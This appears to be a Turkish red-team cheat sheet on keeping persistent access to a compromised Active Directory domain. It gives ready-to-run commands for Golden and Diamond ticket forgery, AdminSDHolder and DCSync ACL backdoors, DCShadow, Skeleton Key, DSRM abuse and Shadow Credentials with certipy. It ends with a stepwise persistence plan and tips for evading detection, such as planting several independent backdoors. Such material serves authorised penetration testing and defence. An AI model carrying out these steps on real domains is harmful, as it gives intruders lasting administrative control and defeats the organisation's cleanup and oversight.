Skip to content

Domain Persistence

ATT&CK T1098 persistence

Domain ele geçirildikten sonra saldırganlar, tespit ve temizlik sonrası bile erişimi korumak için çeşitli kalıcılık teknikleri kurar. Bunlar genellikle DA/ DCSync yetkisi gerektirir. Amaç: tek bir parola reset’inin erişimi koparmamasını sağlamak.

krbtgt NTLM/AES ele geçince istediğin kullanıcı/gruplarla TGT forge edilir. krbtgt iki kez rotate edilmedikçe (eski + yeni key) biletler yaşamaya devam eder. Ayrıntı: Golden Ticket.

Terminal window
impacket-ticketer -aesKey <krbtgt_aes256> -domain-sid S-1-5-21-... \
-domain domain.local -user-id 500 Administrator

Servis (bilgisayar/servis hesabı) hash’i ile tek SPN’e TGS. DC ile konuşmaz — daha sessiz. Ayrıntı: Silver Ticket.

Meşru bir TGT alınıp PAC manipüle edilir (veya PKINIT/Sapphire ile daha az anomali). Saf forge Golden’a göre PAC alanları gerçek biletlerle uyumlu kalır; bazı tespit kurallarını zorlar.

# Rubeus diamond (örnek akış — geçerli TGT + krbtgt AES gerekir)
Rubeus.exe diamond /krbkey:<krbtgt_aes> /user:Administrator /enctype:aes /ptt

CN=AdminSDHolder,CN=System,DC=… ACL’i, SDProp (~60 dk) ile adminCount=1 nesnelere kopyalanır. Buraya ACE eklemek Domain Admins vb. üzerinde kalıcı hak yayar.

Terminal window
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' \
-PrincipalIdentity eviluser -Rights All
Terminal window
bloodyAD -u admin -p 'Pass' -d domain.local --host DC \
add genericAll 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' eviluser

Düşük profil bir kullanıcıya DS-Replication-Get-Changes + DS-Replication-Get-Changes-All ver; gerektiğinde hash çek.

Terminal window
impacket-dacledit -action write -rights DCSync -principal eviluser \
-target-dn 'DC=domain,DC=local' domain.local/admin:'Pass'
Terminal window
bloodyAD -u admin -p 'Pass' -d domain.local --host DC \
add dcsync eviluser

BloodHound: DCSync / GetChanges / GetChangesAll kenarları.

  • Nested group ile DA’ya dolaylı üyelik.
  • Az bilinen grup ( DnsAdmins → DLL load — ayrı teknik; Account Operators …).
  • Bilgisayar hesabı üzerinde Shadow Credentials bırakma ( Shadow Credentials ).

Saldırgan sahte DC gibi davranıp replikasyonla nesne/öznitelik değiştirir (mimikatz). İki oturum: biri RPC register, biri push.

# Yüksek yetki + özel ortam; lab'da dikkatli kullan
lsadump::dcshadow /object:CN=evil,... /attribute:primaryGroupID /value:512
# ikinci mimikatz:
lsadump::dcshadow /push

LSASS’a yama; tüm hesaplar için master parola (DC reboot’a kadar).

privilege::debug
misc::skeleton

DC’nin yerel Administrator parolası; DSRM logon veya registry ile DsrmAdminLogonBehavior ayarlanmışsa ağdan da kullanılabilir. Parolayı biliniyorsa / set edilmişse backdoor.

# DSRM hash'i SYSTEM hive / ntdsutil ile yönetilir
# mimikatz: lsadump::sam (DSRM bağlamı)
  • CA’da rogue şablon veya ESC1 benzeri kalıcı enroll hakkı.
  • Hedef DA hesabına Shadow Credentials / ekstra KeyCredential.
  • CA private key export (CA ele geçirildiyse) → istediğin UPN’e cert imzala.
Terminal window
certipy shadow auto -u admin@domain.local -p 'Pass' -account 'DC01$'
Terminal window
certipy shadow auto -u admin@domain.local -p 'Pass' -account 'targetuser'
  1. krbtgt AES + NTLM yedekle (offline, şifreli) — Golden için.

  2. DCSync ACE düşük profil kullanıcıya (veya gizli bilgisayar hesabı).

  3. AdminSDHolder ACE (opsiyonel; agresif).

  4. Silver Ticket için kritik sunucu machine hash’leri (CIFS/HOST).

  5. Shadow cred veya cert persistence (PKINIT ortamlarında).

  6. Temizlik için not: hangi SID/ACE/cert eklendi — angajman kapanışı.

  • AdminSDHolder ve açık DA grup üyeliği en çok denetlenen değişiklikler.
  • DCSync ACE’si “sessiz” görünebilir; yine de ACL change event üretir.
  • Skeleton Key / DCShadow çok gürültülü ve kararsız — prod’da nadiren uygun.
  • Golden Ticket’ta AES + gerçek userId (500) kullan; rastgele user PAC anomalisi yaratır.
  • Birden fazla bağımsız persistence bırak; tek vektör temizlenebilir.
  • krbtgt tek reset → eski key hâlâ geçerli; double reset gerekir (temizlik tarafı) — kırmızı takım olarak bunu bilerek “kalıcı” say.
  • AdminSDHolder ACE sonrası 60 dk beklemeden test etmek “çalışmıyor” sanısına yol açar.
  • Silver Ticket PAC’te yanlış domain SID / group RID → erişim denied.
  • DSRM ağ logonu varsayılan kapalı; registry olmadan “ölü” backdoor.

Golden Ticket · Silver Ticket · DCSync · ACL Abuse · Shadow Credentials